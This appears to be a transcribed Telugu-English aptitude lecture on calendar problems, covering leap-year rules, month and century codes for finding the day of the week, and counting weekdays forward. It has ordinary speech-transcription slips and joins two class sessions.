I hope you understand. So this is 15th August 1947. This is a basic question, but what happens if it's a leap year? That's the condition. Alright, now I'll tell you a procedure which you need to follow once again. So leap year లేదు కాబట్టి ప్రాబ్లం లేదు. లీప్ ఇయర్ వస్తే ఏం చేయాలి ఇలాంటి మెథడ్లో? ఇట్ ఈస్ సో సింపుల్, జస్ట్ అ స్మాల్ లాజిక్ విచ్ యూ నీడ్ టు ఫైండ్ అవుట్. Okay, so let me talk about leap year. What does mean by leap year? So leap year is so simple. So initially we had, మీకు just like 30 to 40 seconds description in leap year గురించి మీరు తెలుసుకోవాల్సి ఉంటుంది. Alright, don't worry, you're not going to get the questions on the leap year. I mean, leap year అంటే ఏంటి, ఎన్ని డేస్ ఉంటుంది, అలా మీకు ఏం క్వశ్చన్స్ రావు. But it's your responsibility to understand how to, how leap year works and how leap year got into existence. Alright, so simple. Let's talk about it consists of 365 days. మీరు స్టార్టింగ్లో మీరు చూసినట్లయితే 365 రోజులు అనేది మనం కన్సిడర్ చేసుకుంటున్నాం ఒక ఇయర్కి. బట్ వేరాస్ ఆ 365 డేస్ 1 ఇయర్కి అనేది మీరు ఎలా అనేది చూశారు అంటే జస్ట్ లైక్ సూర్యుని చుట్టూ, సో సన్ యొక్క ఎర్త్ రివాల్వ్స్ అండ్ ఇట్ టేక్స్ 365 days to revolve around the sun అని చెప్తాం. Am I right? This is what the consideration. So ఇది సన్, ఇది ఎర్త్ అని తీసుకుంటే ఇలా తీసుకుంటాం 365 డేస్. బట్ ఇనిషియల్గా అది 365 డేస్ 1 ఇయర్ అని చెప్పి మన యొక్క 65.25 డేస్ అనేది వాళ్ళు తెలుసుకున్నారు. సో ఇనిషియల్గా మనం ఏం చేస్తున్నాం, 365 డేస్ అవుతుంది, అదే మనం 1 ఇయర్గా కన్సిడర్ చేసుకుంటున్నాం. బట్ లేటర్ ఆన్ దే ఫౌండ్ అవుట్ ఇట్స్ నాట్ 365 డేస్, ఇట్ యాక్చువల్లీ 365.25 డేస్. బట్ ఎప్పుడైతే వీళ్ళకి ఇది 365ని కట్ చేసి అండ్ దెన్ సెకండ్ ఇయర్లో కూడా 0.25ని కట్ చేసి అండ్ దెన్ థర్డ్ ఇయర్లో 0.25ని కట్ చేసి సో ఫోర్త్ ఇయర్ చేశారు అంటే 0.75 which has become 366 days. So every year first year lo second. Alright, if I ask you what does mean by leap year, we always come up with 3 points. First point, it has an extra day. Am I right? So normal year consists of 365 days but it consists of 366 days. And third point మీరు చూసినట్లయితే it comes only once in 4 years. So this is the reason you get the date. Let's say for example 15th August 1947. ఇదే క్వశ్చన్ తీసుకుందాం ఎగ్జాంపుల్గా. ఈ 15th August 1947 వచ్చినప్పుడు మీరు చెక్ చేయాల్సింది ఏంటంటే లీప్ ఇయర్ కండిషన్ చెక్ చేయాలి. రిమెంబర్, లీప్ ఇయర్ కండిషన్ చెక్ చేయాలి. సో లీప్ ఇయర్ కండిషన్ నో అయినప్పుడు, రిమెంబర్ లీప్ ఇయర్ నో అయినప్పుడు సో రెగ్యులర్ మెథడ్. So regular method ante so simple. Now what we have done, so given date plus month code plus century code, so regular method మీరు ఫాలో అయిపోవచ్చు లీప్ ఇయర్ కాదు అన్నప్పుడు. బట్ లెట్స్ సే ఇది లీప్ ఇయర్ అయింది అన్నప్పుడు మీరు చెక్ చేయాల్సింది ఏంటి, లెట్స్ సే ఇఫ్ ఇట్స్ అ లీప్ ఇయర్, వన్స్ అగైన్ యూ నీడ్ టు చెక్ ఇన్ లోపల ఉందా ఆ పర్టికులర్ డేట్ అనేది, Jan 21st నుండి February 29th లోపల ఉందా, లేదు మార్చ్ 1st నుండి December 31st లోపల ఉందా అనే కండిషన్ వరకు మీరు చెక్ చేయాల్సి ఉంటుంది. ఐ రిపీట్, సో ఫస్ట్ ఏ ఇయర్ అయినా మీరు చెక్ చేయాల్సింది ఏంటంటే ఫస్ట్ లీప్ ఇయర్ కాదా అనేది చెక్ చేయాల్సి ఉంటుంది. లీప్ ఇయర్ నో అన్నప్పుడు ఏం చేయాల్సిందే, రెగ్యులర్ మెథడ్లో మీరు వెళ్ళిపోవచ్చు. జస్ట్ ద ప్రొసీజర్ మార్చ్ 1st నుండి December 31st లోపల ఉందా అనేది మీరు చెక్ చేసుకోవాల్సి ఉంటుంది. దెన్ వాట్ ఇస్ ద డిఫరెన్స్ అని చెప్పి మీరు నన్ను అడిగారంటే యాడ్ అవుతుంది. ఫర్ ఎగ్జాంపుల్ మనకు నియరెస్ట్ లీప్ ఇయర్ ఏది అని మీరు చూసినట్లయితే 2016 is going to be a leap year. It's a leap year. And next మనం చూసినట్లయితే 2020 is going to be the leap year. Alright, సో ఈ పర్టికులర్ విషయానికి మనకు వస్తే ఫర్ ఎగ్జాంపుల్ ఇప్పుడు నేను 16 Jan 2016 అనే డేట్ని మనం ఎలా సాల్వ్ చేయాలి, లెట్స్ సే 16 March 2016 అనేది ఎలా సాల్వ్ చేయాలనేది మీరు తెలుసుకోవాలి. అది డిస్కస్ చేసిన తర్వాత ఈ 2 పార్ట్స్ మనం డిస్కస్ చేయొచ్చు. సో లీప్ ఇయర్ కండిషన్ మీరు ఎలా చెక్ చేస్తారంటే, రిమెంబర్ ఆల్ ద 4 మల్టిపుల్స్ ఆర్ లీప్ ఇయర్స్. For example 4, 8, 12, 16, 20, 24, 28, 32 all the 4 multiples are leap years. But all the century years are not leap years. Ante for example ఇప్పుడు all the 4 multiples leap years అంటే ఏమవుతుంది, 4, 8, 12 16, 20, 24, 28, 32 it goes on, ఇవన్నీ లీప్ ఇయర్స్. బట్ సెంచురీ ఇయర్స్ అన్ని సెంచురీ ఇయర్స్ లీప్ ఇయర్స్ కాదు. అంటే సెంచురీ ఇయర్స్ అంటే ఏంటి, సో సింపుల్, ద ఇయర్స్ అంటారు ఒక పర్టికులర్ ఇయర్ 00తో ఎండ్ అయితే 100 ఇస్ అ సెంచురీ ఇయర్, 200 ఇస్ అ సెంచురీ ఇయర్, 300 ఇస్ అ సెంచురీ ఇయర్, ఇలా ఇది వెళ్తూ ఉంటుంది, అవునా. సో 4 అనేది ఈవెన్ దో ఫర్ ఎగ్జాంపుల్ 100 అనేది ఈవెన్ దో ఇట్, సో యూ నీడ్ టు అండర్స్టాండ్ దిస్ క్లియర్లీ, అన్ని 4తో డివిజిబుల్ అయ్యే ఇయర్స్ అన్ని లీప్ ఇయర్స్ కావు. ఓకే, ఫస్ట్ పాయింట్, 4 మల్టిపుల్స్ అన్ని లీప్ ఇయర్సే. బట్ అట్ ద ఇయర్ 200 తీసుకుందాం, ఇయర్ 300 తీసుకుందాం, ఇయర్ 400 తీసుకుందాం. సి 100 ఇస్ డివిజిబుల్ బై 4, సో బట్ ఇట్ ఇస్ నాట్ అ లీప్ ఇయర్. 200 is divisible by 4 but it's not a leap year. 300 is divisible by 4, it's not a leap year. So century years వచ్చేసరికి మీరు ఏం చెక్ చేయాలి అంటే 4తో చెక్ చేయకూడదు, మీరు 400తో చెక్ చేయాలి. ఇదొక లీప్ ఇయరా కాదని చెక్ చేస్తే ప్లీజ్ డోంట్ డివైడ్ ఇట్
by 4. 4 తో డివైడ్ చేయదు జస్ట్ బికాస్ ఇట్స్ అ సెంచురీ ఇయర్. సెంచురీ ఇయర్ అంటే 00 ఎండింగ్ ఇయర్. 00 ఎండింగ్ ఇయర్ని మీరు దేంతో చెక్ చేయాలంటే 400తో చెక్ చేయాలి. 1300 తీసుకుందాం. 1300 లీప్ ఇయర్ అంటే మీరు 4తో డివైడ్ చేస్తే రిమైండర్ 0నే వస్తుంది. 3 is 1200, రిమైండర్ ఎంత 100. ట్రై టు అండర్స్టాండ్ ఇయర్ 1300 ఇస్ నాట్ అ లీప్ ఇయర్. సో 400తో డివైడ్ చేయాల్సి ఉంటుంది. ఫర్ ఎగ్జాంపుల్ 2000 ఇస్ ద బెస్ట్ ఎగ్జాంపుల్. 2000 ఇయర్ అనేది 4తో డివైడ్ చేయదని 400తో చేయండి. ఎస్, 400 into 5 2000, ఇట్స్ అ లీప్ ఇయర్. బట్ ఇయర్ 2100 తీసుకుందాం. 2100, ఇట్ ఈస్ డివిజిబుల్ బై 4, బట్ స్టిల్ ఇట్స్ నాట్ ఎ లీప్ ఇయర్. ఎందుకంటే 00 ఎండింగ్ ఇయర్ అయితే మనం 400తో డివైడ్ చేయాలి. 400తో మీరు డివైడ్ చేసినప్పుడు ఏమవుతుందంటే మీకు 100 అనే రిమైండర్ వస్తుంది. ఇట్ ఈస్ నాట్ ఎ లీప్ ఇయర్. ఆల్రైట్, సో దిస్ ఇస్ హౌ యూ డీల్ విత్ ద లీప్ ఇయర్. నా సో లీప్ ఇయర్ ఎలా ఫైండ్ అవుట్ చేయాలని చెప్పి మనం చూసాం కదా. ఇప్పుడు మనం ఏం చేయాలి అంటే, సో లీప్ ఇయర్ చెక్ చేశారు. సో లీప్ ఇయర్ ఎస్ అనే కండిషన్ వచ్చిందని తీసుకుందాం ఫర్ ఎగ్జాంపుల్. సో లీప్ ఇయర్ ఎస్ అనే కండిషన్ చెక్ చేశారు అంటే మీరు నెక్స్ట్ కండిషన్ చెక్ చేయాల్సింది ఏంటంటే ఇచ్చిన ఆ డేట్ Jan 1st నుండి February 29 లోపల ఉందా, లేదు March 1st నుండి December 1st లోపల ఉందా అనేది మీరు చెక్ చేయాల్సి ఉంటుంది. సో టెక్నికలీ లీప్ ఇయర్ స్టార్ట్స్ ఫ్రమ్ March 1st. ఎగ్జాంపుల్ ఎలా అంటే 2016లో జనవరిలో మీరు ఎన్ని డేస్ ఉంటుందంటే 31 డేస్ ఉంటుంది. అట్ ద సేమ్ టైం 2015 క్యాలెండర్లో జనవరి ఎన్ని డేస్ ఉంటుందంటే 31 డేస్ ఉంటుంది. సో టోటల్ కౌంట్ అనేది సేమ్ ఉంటుంది. బట్ మీకు క్యాలెండర్ డిఫరెన్స్ ఎప్పుడు వస్తుందంటే మీరు Jan 1st నుండి March 1st దాకా లీప్ ఇయర్లో ఎన్ని డేస్ ఉన్నాయి, Jan 1st నుండి March 1st దాకా నాన్ లీప్ ఇయర్లో ఎన్ని డేస్ ఉన్నాయని చూసినప్పుడు టోటల్ కౌంట్ చేంజ్ అవుతుంది. సో టెక్నికలీ లీప్ ఇయర్ స్టార్ట్స్ ఫ్రమ్ March 1st ఆన్వర్డ్స్. సో ఎప్పుడైతే మీకు లీప్ ఇయర్ అయ్యింది, ఇయర్ లీప్ ఇయర్ అయ్యింది, డేట్ Jan 1st నుండి Feb 29 దాకా ఉందో మీకు వచ్చిన ఆన్సర్ని యూ హ్యావ్ టు డూ -1. మీకు వచ్చిన ఆన్సర్ని యూ హ్యావ్ టు డూ -1. ఇఫ్ ద గివెన్ డేట్ ఇస్ ఇన్ బిట్వీన్ March 1st to December 31st, నో నీడ్ టు డూ ఎనీథింగ్, జస్ట్ గో హెడ్ యాజ్ ఇట్ ఇస్. ఆల్రైట్, దీనికి నేను ఎగ్జాంపుల్స్ ఇప్పుడు మీకు చెప్తాను. లెట్స్ స్టార్ట్ విత్ నేను 2 డేట్స్ తీసుకుంటాను ఇప్పుడు. లెట్స్ స్టార్ట్ విత్ సి 1st Jan 2000. 1st Jan 2000 తీసుకుందాం. అండ్ దెన్ అనదర్ డేట్ విచ్ ఇస్ 1st March 2000. ఆల్రైట్, వాట్స్ ద డిఫరెన్స్ అనేది మనం ఇప్పుడు చెక్ చేద్దాం. నా ఇది మీరు చూసినట్లయితే ఇది ఫస్ట్ స్లాట్లో ఉంది. అంటే Jan 1st నుండి February 29 దాకా ఇది ఉంది. ఇదేంటంటే March 1st నుండి December 31st మధ్యలో ఒక డేట్ ఇది. ఆల్రైట్, మీకు ఇంకా కన్ఫ్యూజన్ వద్దు అనుకుంటే మీరు 5 తీసుకోవచ్చు. ఆల్రైట్, 5th Jan 2000 and 5th March 2000. ఆల్రైట్, నా ఫస్ట్ థింగ్ జస్ట్ చెక్ వెదర్ ద గివెన్ ఇయర్ ఇస్ అ లీప్ ఇయర్ ఆర్ నాట్. ఆబ్వియస్లీ ఇట్స్ అ లీప్ ఇయర్, ఎందుకంటే ఇట్స్ అ సెంచురీ ఎండింగ్ ఇయర్. సో సెంచురీ ఎండింగ్ ఇయర్ అంటే ఐ నీడ్ టు డివైడ్ దిస్ ఇయర్ యూజింగ్ 400. Am I right? So it is 5. Let's start with, so 5th Jan 2000 ఏ డేట్లో వస్తుంది. వాట్ వాస్ ద డే ఆన్ 5th Jan 2000. సో ఇన్ సచ్ కేస్ ఇది మీరు ఎలా సర్చ్ చేస్తారంటే గివెన్ డేట్ విచ్ ఇస్ 5, గివెన్ డేట్ 5 ప్లస్ మంత్ కోడ్. సో మంత్ code of Jan, it is 00. Am I right? 033. That's what I said. So 00 plus century code 2000 మీకు ఏం చెప్పాను, it is 06 of the given year. ఈ క్వశ్చన్ మీకు వచ్చి ఉంటుంది. లాస్ట్ 2 digits 00, no changes at all. ప్లస్ ఈ పర్టికులర్ క్వశ్చన్ మీ యొక్క క్వశ్చన్స్ అన్నిటినీ సాల్వ్ చేస్తుంది మీ మైండ్లో. సెంచురీ కోడ్ లాస్ట్ 2 digits ఇక్కడ 00 ఏం లేదు. అండ్ దెన్ 00 4 multiples ఉంటాయి అంటే నో 4 multiples at all. 00 just by 6 అంటే మిగతా అన్ని జీరోస్ ఉన్నాయి ఇక్కడ. 5 plus 6 మీరు చూసినట్లయితే 11/7 and 11/7 what's the remainder? 11/7 the remainder is 4. 11/7 the remainder is 4. But so as I told you, ఒకవేళ Jan 1st నుండి February 29th లోపల యాజ్ యూజువల్ ఏముంటుంది, ఇట్స్ థర్స్డే. బట్ మీ క్యాలెండర్ చెక్ చేసి ఇది థర్స్డే ఉండదు ఈ పర్టికులర్, ఎందుకంటే ఇది లీప్ ఇయర్ కేసు ఉంది. అట్ ద సేమ్ టైం ఇదేమో 1st Jan నుండి Feb 29th Feb అనే కేసులో ఉంది. సో ఇన్ సచ్ కేస్ యూ హ్యావ్ టు డూ -1 విచ్ ఇస్, సో రిమైండర్ ఏదైతే మీకు వస్తుందో దానికి మీరు -1 చేయాలి. దానికి మీరు -1 చేస్తే you'll get the remainder as 3. So 3 is obviously Wednesday. మీరు క్యాలెండర్ చెక్ చేసినట్టయితే it is going to be Wednesday, it is not Thursday. Alright, now let's see how this works. Guys, it is so simple. It's March. Am I right? No need to do -1. Just go ahead as it is. Now let's do this. It's going to be 05. So 05 is the given date, and March obviously 0336. And what is the March? It is 3. The code is 3. Am I right? For March it is code 3 plus century, same thing here, century by 7. Now just add all the things here. 5 plus 3 it is 8, and obvious 5 plus 3 day. No need to change anything.
please don't do -1 here just because it's a leap year condition, and leap year condition లో ఇది మీరు చూసినట్లయితే మన సెకండ్ స్లాట్లో ఉంది, అంటే 1st March నుండి December 31st March లోపల ఉంది కాబట్టి డోంట్ డూ -1 కాదా. లీప్ ఇయర్ అయింది అంటే లీప్ ఇయర్ కాలేదు అంటే నో నీడ్ టు డూ ఎనీథింగ్, జస్ట్ ఫాలో ద ప్రొసీజర్ వాట్ ఎవర్ ఐ సెడ్. సో గివెన్ డేట్ ప్లస్ సెంచరీ కోడ్ ప్లస్ మంత్ కోడ్ ప్లస్ లాస్ట్ 2 digits of the given year plus a number of 4 multiples in the last 2 digits of the given year by 7. Whatever the remainder you get, just convert into day and then put the answer. Now if it's a leap year, you need to check one thing. A leap year lo entante first year meer check chesetappudu century year kaadu ante just divided by 400 and you need to understand whether it's a leap year or not. So 2000 kabatti I've divided it by 400 and I know it's a leap year. Fantastic. So leap year నేను తెలుసుకున్న తర్వాత నేను చెక్ చేయాల్సిన కండిషన్ అంటే 1st January నుండి February 29th వరకు ఉందా డేట్స్, లేదంటే 1st March నుండి December 31st వరకు ఉందా అని చెప్పి. సో హియర్ ఇన్ దిస్ కేస్ ఐ నో ఇట్స్ 1st January to 29th February మధ్యలో ఉంది కాబట్టి డెఫినెట్లీ వాట్ ఎవర్ ద రిమైండర్ ఐ గెట్ ఐ నీడ్ టు సబ్ట్రాక్ట్ మై 1 from that so that I'll get the answer. If it is from 1st March to December 31st, no need to change any, just proceed as it is. Alright, I hope you understand how this works. Now the next question, the next concept, calendars lone inko konni rendu moodu chinna concepts unnai which you need to find out. Today is Monday. See, don't ask me, sir, today is not Monday, but just for an assumption, my exams ila vastundi. Today is Monday. So what will be the day after, let's say 40 days. What will be the day after 40 days? Okay, today is Monday. What will be the day after 40 days? It is so simple. See, today Monday, 40 days tarvata enti ante in the sense countdown ee roju nunche start avutundi. Monday anedi 1, Tuesday anedi 2 ila veltundi. 40 days tarvata enti ani. So remember me. All right. So after 40 days ante 41st day em ostundani cheppi. In such case it is so simple. So just write down 4 day once again. సో ఈరోజు ట్యూస్డే అంటే ఆఫ్టర్ 7 days. సో 7 days తర్వాత డేస్ అనేది మీకు రిపీట్ అవుతుంది. ఫర్ ఎగ్జాంపుల్ డే 1 అనేది మండే అంటే డే 8 అనేది కూడా మండే వస్తుంది. డే 1 అనేది ట్యూస్డే అంటే డే 8 కూడా, ఫర్ ఎగ్జాంపుల్ డే 2 ట్యూస్డే అంటే డే 9 + 7 డే 9 కూడా ట్యూస్డేనే. సో +7 చేస్తే అదే వస్తుంది. ఇన్ సచ్ కేస్ 7:40 మండే మనం స్టార్ట్ చేసాం కౌంట్ డౌన్. సో మండే డే 1 అంటే డే 1 మండే. సో డే 2 ఏమవుతుంది, ఇట్ ఇస్ ట్యూస్డే. డే 3 ఏమవుతుంది, ఇట్ ఇస్ వెన్స్డే. సో 5 వచ్చింది కాబట్టి జస్ట్ రిలేట్ ఇట్ టు డే 5. ఆల్ రైట్, ఐల్ రిపీట్ ఇట్ వన్ మోర్ క్వశ్చన్. ఇట్స్ వెరీ సింపుల్ లాజిక్. ఆల్ రైట్, లెట్స్ సీ another question. Today is after 110 days. After 110 days. Today is Wednesday. 110 days. 110 days తర్వాత ఏం డే అని చెప్పి మిమ్మల్ని అడుగుతారు. సో సింపుల్, జస్ట్ రిమెంబర్ డే 1 ఏంటి, కౌంట్ డౌన్ ఈ రోజు నుంచి. Hello everyone, welcome to Aptitude Foundation course presented by APSSTC. So in the yesterday's class we were discussing the calendars, am I right? The shortcuts, the codes for days, months and the century. Based on the codes, how to deal with the procedure. Let's start with just a recap. Let's see em jarigindani okasari chuddam ante. Let's see, first thing, if ఒక పర్టికులర్ డేట్ ఇచ్చి మనల్ని డే ఎలా ఫైండ్ అవుట్ చేయాలి అని చెప్పి చెక్ చేసినప్పుడు మనం ఏం చేస్తాం, వి ఫాలో పర్టికులర్ ప్రొసీజర్. వాట్ వాస్ దట్ ప్రొసీజర్? ఫస్ట్ ఇనిషియలీ వి విల్ చెక్ వెదర్ దట్ పర్టికులర్ ఇయర్ ఇస్ లీప్ ఇయర్ ఆర్ నాట్. am I right? ఫస్ట్ లీప్ ఇయర్ కాదనేది చెక్ చేస్తాం. ఒకవేళ లీప్ ఇయర్ కాదు అంటే వి విల్ గో విత్ ద ప్రొసీజర్. ప్రొసీజర్ ఇస్ నథింగ్ బట్ గివెన్ డేట్ ప్లస్ మంత్ కోడ్ ప్లస్ సెంచరీ కోడ్ ప్లస్ లాస్ట్ 2 digits of the given year plus number of 4 multiples in the last 2 digits of the given year by 7 అనేది చేస్తాం. And then finally whatever the number we get, whatever the fraction we get, we will divide it, we will do the division. Cancellation చేయదని చెప్పాను, we will do the division and finally we will find out the remainder. For example 12/7 అనేది మనకు వచ్చిందంటే 5 అనేది అక్కడ రిమైండర్ గా యాక్ట్ అవుతుంది. ఆ 5 అనేది మనం డే కి మనం ఈక్వేట్ చేసి ఏ పర్టికులర్ డే వస్తుందని చెక్ చేస్తాం. అండ్ దెన్ లెట్స్ సే ఇఫ్ ఇట్స్ అ లీప్ ఇయర్. లీప్ ఇయర్ అయితే ఏం చేయాలనేది నేను మీకు 2 కేసెస్ ఇచ్చాను. ఫస్ట్ థింగ్, లెట్స్ సే 2000 అనే ఇయర్ వచ్చింది. ఫర్ ఎగ్జాంపుల్
ఒక పర్టికులర్ డేట్ అనేది ఏంటి అనేది కాసేపు పక్కన పెడితే ఇయర్ అనేది 2000 వచ్చిందంటే సో లీప్ ఇయర్ కాదా, సెంచురీ ఇయర్ ఎండింగ్ అంటే సెంచురీ ఇయర్ అంటే ఎలా చెక్ చేస్తాం మనం, 00 ఎండింగ్ అంటే ఎలా చెక్ చేస్తాం, 400తో డివిజిబుల్ అయిందా లేదా అనేది చెక్ చేస్తాం. ఇదే నార్మల్ ఇయర్ వచ్చింది, లెట్స్ సే 1964 అనే ఇయర్ ఉంది, సెంచురీ ఇయర్ కాకుండా 1964. దీనికి లీప్ ఇయర్ మనం కండిషన్ ఎలా చెక్ చేస్తామంటే లాస్ట్ 2 డిజిట్స్ తీసి జస్ట్ 4తో డివిజిబుల్ లేదా అనేది చెక్ చేస్తాం. 64 4తో డివిజిబుల్ అయితే లీప్ ఇయర్, కాకపోతే నాట్ ఎ లీప్ ఇయర్. బట్ సెంచురీ ఎండింగ్ ఇయర్ అయితే వీ విల్ డెఫినెట్లీ క్రాస్ చెక్ with 400. ఫర్ ఎగ్జాంపుల్ ఇయర్ 1700 అనేది సెంచురీ ఇయర్, ఎందుకంటే 00తో ఎండ్ అవుతుంది. 1700 అనేది మనం 4తో చెక్ చేయకూడదు లీప్ ఇయర్ కండిషన్ కోసం మనం. అండ్ మంత్ 1st January నుండి February 29th దాకా మనకు డేట్ ఉంటే వీ హ్యావ్ టు డూ ఫైనల్ రిమైండర్లో వీ నీడ్ టు డూ -1. అండ్ దెన్ March 1st నుండి December 31st ఉండిందంటే నో నీడ్ టు డూ ఎనీథింగ్, జస్ట్ గో హెడ్ యాజ్ ఇట్ ఈస్. సో దిస్ వాస్ ద ప్రొసీజర్ వీ వర్ డిస్కసింగ్ ఎస్టర్డే. నౌ ఐఎమ్ గోయింగ్ టు ఎగ్జామినేషన్ అనేది మనం చెక్ చేద్దాం. లెట్స్ సీ ద ఫస్ట్ క్వశ్చన్. If you see the first question, which among the following year is a leap year? మనం చెక్ చేయాలి. సో ఇక్కడ చూసినట్లయితే ఫస్ట్ చూడండి, ఫస్ట్ ఆప్షన్ ఇట్ ఇస్ 2600. సో 2600ని మీరు 400తో డివైడ్ చేయాల్సి ఉంటుంది. లెట్స్ సీ హౌ దిస్ వర్క్స్. హియర్ ఇట్ ఇస్ 2600. సో 2600ని మీరు 400తో డివైడ్ చేయండి. సో ఇట్స్ సెంచురీ ఇయర్స్. అండర్స్టాండ్, ఈ ఆప్షన్స్లో అన్ని సెంచురీ ఇయర్సే. సో సెంచురీ ఇయర్స్ కాబట్టి సెంచురీ ఇయర్స్ 00 ఎండింగ్ 2600, 2700, 2800 and then if you see what is that, 3000 and then 3400 years ఇచ్చారు. సో దీన్ని ప్లీజ్ డోంట్ యూస్ 4 ఇయర్స్ నాట్ అ లీప్ ఇయర్. సో 400తో డివైడ్ చేసినప్పుడు మనకు రిమైండర్ 0 వచ్చినప్పుడు మాత్రమే అది లీప్ ఇయర్ అవుతుంది. బట్ హియర్ ఇట్ ఇస్ 200 రిమైండర్, ఇట్ ఇస్ నాట్ అ లీప్ ఇయర్. నౌ లెట్స్ సీ వాట్ ఇస్ సెకండ్ ఆప్షన్ విచ్ ఇస్ 2700. మీరు క్వశ్చన్ ని చూసినట్లయితే నెక్స్ట్ ఆప్షన్ మనకి 2700 ఉంది. 2700ని 400తో ఇన్స్టెడ్ ఆఫ్ గెటింగ్ ద రిమైండర్ 0 we are getting reminder as 300 which is not a leap year. Now let's see the third option which is 2800. Am I right? Third option is 2800. సో దీన్ని మనం 400, దిస్ ఇస్ ద లీప్ ఇయర్. 2800 అనేది లీప్ ఇయర్ అవుతుంది. అండ్ దెన్ లెట్స్ సీ థర్డ్ ఆబ్వియస్లీ ఆన్సర్ ఇదే, బట్ స్టిల్ మీరు ఇంకొక 2 ఆప్షన్స్ కూడా చెక్ చేసుకోవాలి అన్నప్పుడైతే నెక్స్ట్ చూసారంటే 3000 ఇయర్ 3000 and 400 which is 3400. సో ఈ 3400ని మీరు 400తో డివైడ్ చేసినట్లయితే which is దానికి నేను ఇలాంటి డివిజన్స్ చేస్తున్నాను. 400 మల్టిపుల్స్ అన్ని లీప్ ఇయర్సే, అంటే 4 మల్టిపుల్స్ అన్ని లీప్ ఇయర్సే. సెంచురీ ఇయర్స్ అప్పుడు 400 మల్టిపుల్స్ అవ్వాలి. సో విచ్ ఇస్ నథింగ్ బట్ 400, 800 అండ్ దెన్ 1200, 1600, 2000, 2400, 2800, 3200, 3600 ఇలా వెళ్తుంటుంది. 400 టేబుల్లో లీప్ ఇయర్స్ అనేది వెళ్తుంటుంది సెంచురీ ఇయర్స్ కాబట్టి. సో హియర్ యాజ్ పర్ దిస్ క్వశ్చన్ ది ఆన్సర్ ఇస్ 2800. ఇయర్ 2800 అనేది లీప్ ఇయర్, రెస్ట్ ఆఫ్ ఆల్ నాట్ అ లీప్ ఇయర్. లెట్స్ సీ ద నెక్స్ట్ క్వశ్చన్ అండ్ సి అంటే 2004 మార్చ్లో థర్స్డేస్ అన్ని ఏ డేట్స్లో వస్తున్నాయి. ఐ రిపీట్, 2004 మార్చ్లో థర్స్డేస్ అన్ని ఏ డేట్స్లో వస్తున్నాయి. నా ఇఫ్ యూ ఆస్క్ మీ హౌ టు ఫైండ్ అవుట్ దిస్, వెరీ సింపుల్. డైరెక్ట్గా థర్స్డే ఏంటి అనేది మనం చెక్ చేయడం అనేది నాట్ పాసిబుల్. సో బాగా అర్థం చేసుకోండి. మార్చ్ 2004లో థర్స్డేస్ ఏ డేట్స్లో ఉన్నాయి అంటున్నారు. సో ఇది ఒక థర్స్డేనా అంటే నో, వీ నీడ్ టు ఫైండ్ అవుట్ ఆల్ ద థర్స్డేస్. సి మినిమం అని చూసారంటే 4 థర్స్డేస్ ఉండొచ్చు, మాక్సిమం అని చూసారంటే 5 థర్స్డేస్ ఉండొచ్చు. దర్ ఇస్ నో పాసిబిలిటీ దట్ యూ కెన్ గెట్ లెస్ దెన్ 4 థర్స్డేస్ ఆర్ మోర్ దాన్ 5 థర్స్డేస్. సో 4 అనేది మినిమం, 5 అనేది మాక్సిమం. సో ఆ పర్టికులర్ థర్స్డేస్ అన్ని ఏ డేట్లో వస్తున్నాయి అనేది మనం చెక్ చేయాలి. సో ఫస్ట్ థర్స్డే మనకి ఎప్పుడు వస్తుందని తెలిస్తే ఆటోమేటిక్గా మిగతా థర్స్డేస్ అనేది మనం ఫైండ్ అవుట్ చేయొచ్చు. అది ఎలా చేయాలి? సో సింపుల్. ఫస్ట్ లెట్స్ ఫైండ్ అవుట్ March 2004. Based on this, we shall calculate accordingly. Alright, so first March 2004 అనేది ఎలా మీరు చెక్ చేయాల్సిందంటే, first thing, the procedure which we need to find out, given date is 01 plus month code. See, मैं already మీకు months की codes ఇచ్చాను, which is 0336146225. 035. These are the month codes to the rest. Then plus century code. So century code we know clearly 1900 నుండి 1999 కి it is 0 and then plus last 2 digits of the given year. Last 2 digits of the given year ఏంటి ఇక్కడ 04 and number of 4 multiples ఎన్ని ఉన్నాయి. ఇది సాల్వ్ చేసే ముందు మీరు అండర్స్టాండ్ చేసుకోవాల్సింది ఏంటంటే 2004 లీప్ ఇయరా కాదా అనేది మీరు చెక్ చేయాల్సి ఉంటుంది. 2004 ఇస్ అ లీప్ ఇయర్, ఎందుకంటే ఇది సాల్వ్ చేసే ముందు ఫస్ట్ మీరు లీప్ ఇయర్ కండిషన్ ఒకసారి చెక్ చేసుకోండి. సో 2004 ఇస్ అ లీప్ ఇయర్, బట్ దీంట్లో వన్స్ మీ 29th లోపల ఉన్న డేట్ ఉందా, లేదు March 1st నుండి December 31st లో ఉన్న డేట్ ఉందా అని చెప్పి. సో దిస్ ఇస్ ఇన్ ద సెకండ్ స్లాట్, అంటే March 1st నుండి
this lot lo undi, just add everything and just like do the division part. Now if you see, it is 1 3, which is 1 plus 3 it is 4, 4 plus 6 it is 10, 14, 15. Am I right? 15 by 7. Let's cross check it once again. 1 plus it is 4, 1 plus 3 4, 4 plus 6 10, 10 plus 4 it is 14 and 1 15, 15 by 7. So one reminder ante idi 8 day avutundi. We know that Monday, 1 stands for Monday, 2 is for Tuesday, 3 is for Wednesday. So 1 ante manaki 8 day equate avutundi, Monday avutundi. And try to understand, ఇది March 1st నుండి December 31st slot లో ఉంది కాబట్టి no need first March, first day of the month అంటే day 1 ఏంటి అని వస్తే చెక్ చేసుకోండి. day 1 అనేది 8 date లో వస్తుందని చెప్పి. సో day 3 అంటే థర్డ్, మార్చ్ థర్డ్ అని మీనింగ్. సో మార్చ్ 1st, మార్చ్ 2nd, మార్చ్ 3rd. మార్చ్ 3rd ఎప్పుడు వస్తుంది మీకు? వెన్స్డే వస్తుంది. సో డే 4 అంటే మార్చ్ 4th. మార్చ్ 4th ఎప్పుడు మీకు వస్తుంది? థర్స్డే వస్తుంది. ఫ్యాంటాస్టిక్. నా ఇన్ ద సెన్స్ 4th March అనేది మీకు థర్స్డే అవుతుంది. ఐ రిపీట్, 4th March అనేది థర్స్డే. ఆల్ రైట్. సో ఫ్రమ్ దిస్ ఐమ్ గోయింగ్ టు ఎరేస్ దిస్. మీకు చూసినట్లయితే ఇట్ ఈస్ థర్స్డే. సో నెక్స్ట్ థర్స్డే ఎప్పుడు వస్తుంది అనేది మన క్వశ్చన్. ఇట్ ఈస్ సో సింపుల్. సో ఈ రోజు తర్వాత ఈ రోజు నుండి 7 days తర్వాత అదే రిపీట్ అవుతుంది, సేమ్ డే రిపీట్ అవుతుంది. ఫర్ ఎగ్జాంపుల్ day 1 మండే అంటే day 1కి +7 మీరు చేసినట్టయితే ఏమవుతుంది? 8 అవుతుంది. 8 కూడా మళ్ళీ మండేనే 